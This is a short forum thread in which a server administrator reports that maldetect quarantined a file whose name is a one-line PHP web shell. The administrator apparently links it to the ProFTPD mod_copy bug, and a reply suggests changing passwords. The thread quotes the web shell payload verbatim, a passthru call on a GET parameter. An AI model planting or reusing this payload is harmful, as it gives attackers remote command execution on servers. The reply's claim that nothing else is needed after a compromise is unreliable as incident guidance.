maldetect finds a script most likely caused by a proftpd bug

  • Hello, we just installed maldetect on our server and a malicious script was found


    {HEX}php.exe.globals.399 : /tmp/.<?php passthru($_GET['cmd']);echo 'm3rg3';?>


    After googling this code it seems that this is related to a bug in proftp http://bugs.proftpd.org/show_bug.cgi?id=4169
    There is also a thread about this bug in this forum and the bug seems to have been fixed in i-mscp 1.2.3
    So this script may have been for some time on our server :(


    maldetect moved this script into quarantine. So far so good ... anything else I should do?

    i-MSCP 1.5.3 | Ubuntu 16.04

  • It's not a bug due imscp! The copy module of proftpd had a vulnability.. I'm sure it's because of that. No nothing else to do, may you should change the passwords.

  • It's not a bug due imscp! The copy module of proftpd had a vulnability.. I'm sure it's because of that. No nothing else to do, may you should change the passwords.

    Thanks for the reply ... yes I know it is not a bug of imsp and it shouldn't sound as if it was imscp related. I just read the other thread that imscp 1.2.3 took care of this bug. I know it is not the fault of imscp. Sorry if this was unclear.


    .

    i-MSCP 1.5.3 | Ubuntu 16.04